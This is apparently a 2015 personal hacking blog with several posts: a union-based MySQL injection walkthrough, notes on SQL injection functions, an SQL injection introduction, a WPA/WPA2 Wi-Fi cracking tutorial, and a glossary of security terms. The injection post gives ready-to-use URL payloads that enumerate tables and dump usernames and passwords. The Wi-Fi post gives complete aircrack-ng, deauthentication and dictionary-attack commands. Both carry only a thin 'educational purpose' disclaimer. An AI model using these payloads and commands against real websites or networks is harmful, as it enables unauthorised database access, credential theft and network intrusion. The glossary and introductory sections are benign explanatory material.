Friday, 25 December 2015

SQL INJECTION --UNION BASED MYSQL INJECTION ---

UNION BASED MYSQL INJECTION ---
This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.
Step 1: find a dynamic page

site.com/page.php?x=y

Step 2: apply ' to check if website is vulnerable or not

site.com/page.php?xid=76'

now the websiite must give you some signs of error like:
SQL error, php error, custom error, page not found, page redirect, blank page, data missing from page, etc

Step 3: Confirm if website is vulnerabke and find the injection type 
(string / integer) by applying --+

site.com/page.php?xid=76'--+

if no error then injection type is string else try removing '

site.com/page.php?xid=76--+

now normal page should open and it means injection type is integer, if still it dosent try another link

NOTE* if injection type is string 

site.com/page.php?xid=76' [sql injection here]--+
      
      if injection type is integer

site.com/page.php?xid=76 [sql injection here]--+

Step 4: get the number of columns in current query using order by (assuming injection type string)

site.com/page.php?xid=76' order by 1--+  no error
site.com/page.php?xid=76' order by 2--+  no error
site.com/page.php?xid=76' order by 3--+  no error
.
.
site.com/page.php?xid=76' order by n--+   error

this means number of columns=n-1

Step 5: find the visibble/vulnerable columns (assuming no of columns=4)

site.com/page.php?xid=76' union select 1,2,3,4--+

now you must see some or all of these numbers (the number that are visible are vulnerable and can be used to get more info)

NOTE* if you dont see any numbers try putting a - sign

site.com/page.php?xid=-76' union select 1,2,3,4--+

if still no numbers then try another type of injection

Step 6: get the name of the database, version and mysql user (assuming column 2 and 3 are visible)

site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+

Step 7: get the names of the tables (assuming database name is xyz)

site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+

note* if you only get a single row use group_concat(table_name) instead of table_name

Step 8: get the names of columns (assuming table name is users)

site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and tabe_name='users'--+

Step 9: get the data (assuming column name is user_name and user_pass)

site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+

Step 10: evil smile 3:)

     

Thursday, 24 December 2015

SQL INJECTION --- UNION BASED SQL INJECTION INTRODUCTION

SQL INJECTION --- UNION BASED SQL INJECTION INTRODUCTION
This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.



few commands that are used in UNION BASED SQL Injection ---

1.union () --
       The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows.

2.group_concat () --
        
     syntax --  group_concat (<column_name>)
       concats the data in all the rows of a column & put it in a single row separated by ','

3.Information_schema () ---( it is like a Index)
        It is a mother database that stored the data about data (metadata) like list of all tables,list of all columns ,the table a column belongs to the database a table, a table belongs to ,data data type of column etc etc...     

4.database () ---
        gets the name of the database presently in use.

5.order by X --
       syntax -- orderby <column no./name> 
       orders the output of select query according in ascending order of the data inside the specified column.

6.limit X,Y ---
       Limit always starts from 0 & gets 'Y' number of rows starting from the 'X+1' rows.

7.user() ---
        gets the MYSQL username of present user.

8.Version() ---
        gets the version of MYSQL installed.

TIPS ---

  • tables --- stores the information about tables.
  • column --- stores the information about column.
  • schemata --- stores the information about Database.       
 

Tuesday, 22 December 2015

SQL INJECTION INTRODUCTION

SQL INJECTION INTRODUCTION--

  • SQL Injection is the most common vulnerability on the internet.
  • It is mainly flaw in the web application & not a Database or web server issue.
  • most programmer are still not aware of this threat.
What is SQL Injection ????
  • Sql injection is a technique used to take advantage of non-validate Input vulnerabilities to pass SQL commands through a web Application for execution by back-end Database.
  • In Other words,Sql injection is a basic techniques /attack used to either gain unauthorised access to a database or to retrieve information directly from the Database.
SQL Injection Attacks ----
  1.  Authentication Bypass --- Using this attacks, an attacker logs on to an application without providing valid username & password & gain the administrative privileges.
  2. Information Disclosure --- Using this attacks, an attacker obtain the sensitive Information that is stored in the database. 
  3. Compromised Data Integrity --- An attacker uses this attack to deface a webpage ,insert malicious content into webpages , or alter the content of database. 
  4. Compromised Availability of Data --- An attacker use this attack to delete the database information logs or audit information that is contained in database. 
  5. Remote code Execution --- It allows an attacker to compromise the Host O.S.
How web Application Works ----


  • The above fig. shows how the initial request is triggered by the user through the browser over the Internet to the web application server. 
  • The web application accesses the databases servers to perform the requested task updating and retrieving the information lying within the database. 
  • The web application then presents the information to the user through the browser.
Web Security Issue ----




  • web applications do raise a number of security concerns stemming from improper coding. Serious weaknesses or vulnerabilities, allow hackers to gain direct and public access to databases in order to sensitive data.
  • Many of these databases contain valuable information (e.g., personal and financial details) making them a frequent target of hackers
  • Websites and related web applications must be available 24 hours a day, 7 days a week, to provide the required service to customers, employees, suppliers and other stakeholders.
  • Firewalls and SSL provide no protection against web application hacking, simply because access to the website has to be made public – All modern database systems (e.g. Microsoft SQL Server, Oracle and MySQL) may be accessed through specific ports (e.g., port 80 and 443) and anyone can attempt direct connections to the databases effectively bypassing the security mechanisms used by the operating system. These ports remain open to allow communication with legitimate traffic and therefore constitute a major vulnerability.
  • Web applications often have direct access to back-end data such as customer databases and, hence, control valuable data and are much more difficult to secure. Those that do not have access will have some form of script that allows data capture and transmission. If a hacker becomes aware of weaknesses in such a script, he may easily reroute unwitting traffic to another location and illegitimately hive off personal details.
  • Most web applications are custom-made and, therefore, involve a lesser degree of testing than off-the-shelf software. Consequently, custom applications are more susceptible to attack.
Types  of SQL Injection ---
There are mainly TWO types of SQL injection ----
1. Simple SQL Injection 
  • Union SQL Injection
  • Error Based SQL Injection.

2.Blind SQL Injection 

okk....now the types of SQL injection related information I will post in My next blog...so GooD ByE frds....



Monday, 30 November 2015

WPA/WPA2 WIFI CRACKING --

WPA/WPA2  wifi cracking-

This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.
Step 1-
In this tutorial, I am going to hack a wifi that I just setup ,named –7 star. Now we have kali linux,open the terminal window & type  in “ifconfig” .This going to  show list all the networking interfaces connected to your device.
Here, I only need (wlan0) which is my wifi card,so I disable the others  interface. By doing -
Ifconfig  <name of interface > down
Eg. Ifconfig  eth0  down. ---by doing this eth0 interface will be disable.

lo  interface doesnot matter ,so remain as it is. 


After  doing so,type again ifconfig  in the terminal,for just check the eth0 interface was disable or not.


Step 2-
Now  switch on the monitor mode by  typeing in the terminal , airmon-ng  start  wlan0


"airmon-ng”  is just a tool for monitoring  air traffic. While “start” is basically start the tool & “wlan0” specifies the interface we are using for  monitoring.
It probably shows  some process that could cause trouble ,so we will kill those process by entering or typeing in the terminal--->
Syntax-->
kill  <process ID>
Eg-->
 here my process id is 2615 ,2637,3581,3675  etc. that could cause trouble. So I type in the terminal,
   Kill 2615
   Kill 2637
  Kill 3581  …..etc 


you do “ifconfig” ,it should show us the newly made monitoring interface i.e. “mon0”

Step  3-
Now type ,airodump-ng  mon0

It  will shows the all visible nearby networks. The moment you see the your network  press  ctrl+ C to cancel the dumping. & note down the bssid & channel no of victim n/w.
Here, BSSID --The mac address of the  victim network.

           CH (-c) -- channel number of victim n/w.

            airodump-ng --tool for capturing wifi packets

           (-w) --write the filename.

Now  I identified the victim network. That is shown in following fig.  highlight in white colour. After  The moment you see the your network  press  ctrl+ C to cancel the dumping. & note down the bssid & channel no of victim n/w.

Step -4
start capturing  all the packets related to the specific  network  &  store the data in the file. 
Syntax-->
airodump-ng   --bssid  <bssid number>  -c  <channel no>  -w <file name>  <interface>
Eg-
here,my  victim n/w  bssid number --28:C6:8E:D9:17:77 & channel no -- 5  

airodump-ng    --bssid  28:C6:8E:D9:17:77  -c  5  -w  handshake  mon0

here,”handshake” is the filename. For our conviniance.


Step  5-
Don’t close the terminal  open the new terminal &  disconnect all the existing client ,so that they try to reconnect  & we get the WPA  handshake in the terminal one.
Syntax--
 aireplay-ng  --deauth  10  -a  <bssid number>  mon0
Eg--
aireplay-ng  --deauth  10  -a  28:C6:8E:D9:17:77  mon0
Now,you must see a handshake  captured on top right corner  of terminal  one. If you not see …then run the command again.
Note that--
 don’t  do the deauth 0 , as if done  the deauth will not stop  & nobody will be able to connect  that wifi  
Now,once you  done the handshake  you can close the terminal  one ,the handshake is now stored in the file named as (handshake-01.cap)
Note  that --
  if  you run the airodump-ng  command 2 times  with the same file name ,then file name will change to  filename-02.cap  & so on….

Step 6--

If you type “ls “ command you can clearly see  so many files ,but  we need only handshake-01.cap .


Step  7--
Now  we  want  to  find the key.  For that 2 ways  --

1. Dictionary attack (brute forceing)--
 Syntax --
  aircrack-ng  -w   <dictionary path>   <file name path>
Eg-- in this case my both dictionary & files  are in home folder. So I just type-->
aircrack-ng   -w  rockyou.txt   handshake-01.cap

Now  it can  autonatically bruteforcing…..but  it takes  some times ....
Way ---2  --->
Generate  the dictionary  using crunch  command.
Syntax --
 crunch  <minlength>  <maxlength>  <character>  -o outputfilename.txt
Eg--
crunch  12  12  0123456789 | aircrack-ng  -b  <bssid number>  <filename>  -w  -
note --
 if the symbol  is used in the crunch that put into  inverted commas (‘  ‘)

Now it will automatically scan the password...

It takes some times & finally you get password.


&  it works ….:)


Thursday, 17 September 2015

Cyber security terms you really need to know -


 


1.Anti-spyware Software    --
       Anti-spyware software is used in detecting, blocking and/or removing spyware attempts.

Spyware is a type of software that seeks to gather your personal information, without your permission. It has the capability to take over your computer entirely! The information it collects is then sent to a third party without your consent.
There 4 main different types of spyware:
  • system monitors,
  • Trojans,
  • adware,
  • and tracking cookies.
Spyware is mainly used for tracking a user’s movements online and serving annoying and dangerous pop-up ads.

HOW YOU CAN GET INFECTED:

Your system can get infected with spyware if you visit certain websites, by pop-up messages that ask you to download an application or program (told you they’re evil!), through security holes in the browser or in other software, etc.

Usually, spyware is well hidden and it’s also difficult to observe. You might notice a spyware infection when the virus starts using your system’s resources and slows it down in a way that will make you really, really angry.
 
  1. Antivirus Software   

Antivirus software, sometimes called an anti-malware program (you can also call it AV if you want to show off), is computer software used to prevent, detect and remove malicious software.

Antivirus protects your computer from a large number of threats, such as ransom-ware, rootkits, Trojans, spyware, phishing attacks or botnets.

Without getting technical, let’s just say that the way antivirus scans for infections is not really coping with current threats. Cyber criminals are smart. Really, really smart! And their attacks are vicious, so just remember that antivirus is not enough and you need something more to keep you safe.

But that doesn’t mean you don’t need antivirus. YOU DO, trust me! But you need other stuff too and I’ll tell you more about that later on.
 
  1. Cyber-Attack

A cyber-attack is classified as any type of offensive action used by cyber criminals to deploy malicious code in your system with the purpose of stealing, altering, destroying or taking any advantage from this action.

Cyber-attacks can target both people and things. ANYWHERE. ANYTIME.  Individual users, computer networks, information systems, IT infrastructure of all types and sizes – no one is safe! (And I’m not being dramatic about it.)

And smarter cyber criminals launch stronger attacks, which lead to worse consequences.
 
  1. Drive-by download   

A drive-by download can refer to 2 things:
  1. A download which you authorized but without understanding the consequences (example: downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).
  2. The unintentional download of a virus or malicious software (malware) onto your computer or mobile device.

HOW YOU CAN GET INFECTED:

Drive-by downloads can happen when you visit a website, when reading an email or by clicking on a deceptive pop-up window.

These type of malicious downloads usually take advantage of (or “exploit”) a browser, an app, or an operating system that is out of date and has a security flaw that has not been solved or patched.

This is why it’s crucial to constantly maintain your software updated. (No worries, I’ll nag you about this along the way.)
 
  1. Exploit

An exploit is a piece of software, a chunk of data, or a set of commands that takes advantage of a bug, glitch or vulnerability in order for malicious purposes.

Exploits can cause disruptions in the behavior of computer software, hardware, or something electronic (usually computerized).

HOW YOU CAN GET INFECTED:

By using exploits, cyber criminals can gain control of your computer.

After that, they can do pretty much what they want.

One of the ways to protect yourself from exploits is to keep your software updated at all times (told you I’d nag you about this!) and take all essential security measures (which I’ll show you in this course).
 
  1. Keylogging     

Keylogging (also called keystroke logging) is a method that cyber criminals use to record (or log) the keys you strike on your keyboard in order to get confidential information about you.

Of course they do this in a concealed manner, so that you won’t know you are being monitored while typing passwords, addresses and other secret data on your keyboard as usual.

HOW YOU CAN GET INFECTED:

Keyloggers are usually used with malicious intentions, to steal passwords or credit card information.

Although many anti-spyware applications can detect some software based keyloggers and quarantine, disable or cleanse them, there is no solution that can claim to be 100% effective against this type of threat.
 
  1. Malver-tising  

Malver-tising (short for "malicious advertising") is the use of online advertising to spread malware.
Cyber criminals inject malicious or malware-loaded code into online advertising networks or legitimate websites, which then infect your systems through clicking, redirection or drive-by downloads.

Since online ads are managed by online advertising networks, even a legitimate website may host an infected web banner, although the website itself remains uncompromise. Some of the websites that have unknowingly hosted malver-tising are The New York Times, the London Stock Exchange, Spottily, and The Onion.

HOW YOU CAN GET INFECTED:

Cyber criminals use pop-up ads, drive-by downloads, web widgets, hidden iframes, malicious banners, and third-party applications (example: forums, help desks, customer relationship management systems, etc.) to deliver malware. This is why malvertising is so wide-spread, affecting many users without their knowledge.
 
  1. Malware

Malware (short for malicious software) is one of the terms you’ll hear most often when it comes to cyber security threats. The terms defines any software used by cyber criminals to:
  • disrupt computer operations,
  • gather sensitive information,
  • or unlawfully gain access to private computer systems.

Malware is characterized by its malicious intent, because it acts stealthily to steal your information or to spy on your computer for a long time, without your knowledge.

'Malware' is a general term used to refer to an entire category of malicious or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other harmful programs.

HOW YOU CAN GET INFECTED:

Malware is usually spread through executable code, scripts, active content, and other software. The major threat is poses comes from malware being disguised as, or embedded in, non-malicious files, such as .jpeg, .mpeg, .exe, .gif, .mp3 and many, many more.

You should definitely check out this list of
50+ File Extensions That Are Potentially Dangerous on Windows to get an even better idea of how malware can sneak into your system.
 
  1. Patching          

Patching is the process of updating software to a different, newer version. A patch is a small update released by a software manufacturer to fix bugs in existing programs.

A patch can relate to features and usability, but is can also include security features.

Patching is essential for your online security, because it prevents cyber criminals from launching attacks using Zero Day viruses (definition at #18).
 
  1. Phishing           

Phishing is (yet) another method that cyber criminals use in order to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by posing as a trustworthy entity in emails or other means of electronic communication.

Phishing is an example of social engineering techniques (definition at #12) used to deceive users, and exploits the poor usability aspects of current web security technologies.

HOW YOU CAN GET INFECTED:

 A phishing email could seem that it legitimately comes from your bank, and could trick you into entering valid credentials on a fake website.

Phishing is done through emails, instant messaging apps or social media posts (on Facebook, Twitter, LinkedIn, etc.).
 
  1. Ransomware

Ransomware is a form of malware that essentially holds a computer system captive while demanding a ransom.

This type of malware locks you out of your computer by either:
  • encrypting files on the hard drive
  • or locking down the system and displaying messages that extort you into paying the malware creator to remove the restrictions and regain access to their computer, usually via a key. The bad news is that the malware creator is the only one who knows the key.

HOW YOU CAN GET INFECTED:

Ransomware typically spreads like a normal computer worm (by replicating(making exact copy itself) itself in order to spread to other computers), and it could infect your system via a downloaded file or through some other vulnerability in a network service.

The chances of retrieving your data are very small, unless you’re willing to pay the ransom (which is why it’s crucial to have a back-up of your data in a secure location).

The malware creator will either supply a program which can decrypt the files, or he will send an unlock code that decrypts your data. But there is no guarantee that this will happen, even if you pay the requested ransom.
 
  1. Social engineering     

Social engineering is one of the most commonly used methods of cyber hacking, which requires little to no technology. It relies on psychological manipulation to something belive the victims to perform certain actions or make known (private or sensitive ) confidential information.

HOW YOU CAN BE COMPROMISED:

In this case, cyber criminals use lies, impersonation, tricks, bribes, blackmail, and threats (just like your ex) to attack information systems. Phishing (defined at #10) is also a form of social engineering.

For example, cyber criminals may pose as contractors, exterminators, fire marshals and technicians to go unnoticed as they steal your secrets or trick you into  make known (private or sensitive ) confidential information about your company.
 
  1. Spam  

We all know that spam is made of those pesky (Annoying) , unsolicited emails that clog our inboxes. But, in recent years, spam has spread to instant messaging apps, texting, blogs, forums, search engines, file sharing and social media.

HOW YOU CAN GET INFECTED:

While spam itself may not seem very dangerous, it sometimes carries malware, spreads viruses, worms and other types of threats, such as financial theft, identity theft, data and intellectual property theft, fraud, and deceptive marketing.
 
  1. Trojan (Trojan horse)

A Trojan horse (commonly known as a Trojan) is a type of malware that hide itself as a normal file or program to trick you into downloading and installing malware.

A Trojan can do many dangerous things to your system, like give cyber criminals unauthorized, remote access to your infected computer.

Once that happens, cyber criminals can:
  • steal data (logins, financial data, even electronic money),
  • install more malware, modify files,
  • monitor your activity (screen watching, keylogging, etc.),
  • use the computer in botnets (a collection of Internet-connected programs communicating with other similar programs in order to spread malware),
  • encrypt your files, like in the case of ransomware (defined at #11)
  • crash your computer
  • format your disks, destroying all the contents on your device, etc.

HOW YOU CAN GET INFECTED:

There are plenty of ways in which your system can become compromised by a Trojan:
  • through email attachments
  • software or music downloads
  • unsafe instant messages
  • peer 2 peer downloads
  • routine forms that need to be filled in
  • drive-by downloads, etc.
 
  1. URL or web content filtering

URL or web filtering technology is software which keeps you from accessing inappropriate websites or content or that prevents you from ending up in a dangerous web location (and by dangerous I mean malware-laden).

The software’s filter checks the origin or content of a web page against a set of rules provided by company or person who has installed the URL filter. If the web page has been blacklisted or marked as infected, it will deny access to that web location, blocking a potential cyber attack.

 
  1. Virus (Computer Virus)

A computer virus (shortly called virus) is a type of malware (told you it would come up often!) capable of replicating itself and spreading to other computers and data files.

Viruses spread to other computers by attaching themselves to various programs and executing code when you launch one of those infected programs.

But they’re really sneaky, so they can also spread through script files, documents, and cross-site scripting vulnerabilities in web apps (defined at #17).

Viruses are also evil, because they can be used to steal information, harm your computers, log keystrokes (keylogging – defined at #6), create botnets, spam your contacts, steal your money, display political or humorous messages on your screen (the least of your worries), and more.


HOW YOU CAN GET INFECTED:

Viruses install themselves without your permission, because cyber criminals use social engineering (defined at #12) and exploit software bugs and vulnerabilities (defined at #17) to gain access to your computing resources.

Viruses can reside in executable files (.exe or .com files), in data files (Microsoft Word documents or PDFs), or in the boot sector of your hard drive. Or in a combination of all of these.
And the worst part is that some viruses are polymorphic, which means that the virus has no parts which remain identical between infections, making it very difficult to detect directly with an antivirus solution.
 
  1. Vulnerability 

A cyber security vulnerability is a weakness which allows an attacker to undermine your system's data security defenses.

A vulnerability appears at the intersection of 3 elements:
  1. a system susceptibility or flaw (example: your Java software hasn’t been updated to the latest version – seems pretty innocent, right?)
  2. attacker access to the flaw (example: you click on a malware-infected banner ad which delivers a download on your computer)
  3. and attacker capability to exploit the flaw (example:  now the cyber criminal has a way in, through that malicious download).

A vulnerability is just a skill(
an attempt to make something that is not the case appear true.) that a cyber criminal can use to launch a full scale attack on your system. He still needs the right tools for that, but they come in a large supply online and they’re cheap as well.

The way to protect yourself against vulnerabilities is to maintain your software updated at all times.
 
  1. Zero-Day virus          

Now that you know what a vulnerability is, it’ll be really easy to understand what a Zero-Day virus is as well.

Zero-Day viruses appear when cyber criminals discover a flaw in a piece of software (for example, in Adobe Air). They exploit that vulnerability, launching an attack that users can’t defend themselves against, for two simple reasons:
  • The flaw they exploit is attacked by launching a previously unknown computer virus or other malware
  • Antivirus programs rely upon signatures to identify malware, but the signature for this new breed of malware or virus is not in their database, because it’s new and hasn’t been sampled.

That is why antivirus software is not effective against Zero-Day viruses, and that why you need additional solutions to protect you from advanced attacks such as these.

HOW YOU CAN GET INFECTED:

The usual methods described beforehand work in this case as well:
  • drive-by downloads
  • malvertising
  • spam
  • through email attachments
  • software or music downloads
  • unsafe instant messages
  • peer 2 peer downloads
  • routine forms that need to be filled in, etc.

The difference is that, once you get infected, there’s very little you’ll be able to do to stop the infection and mitigate its effects.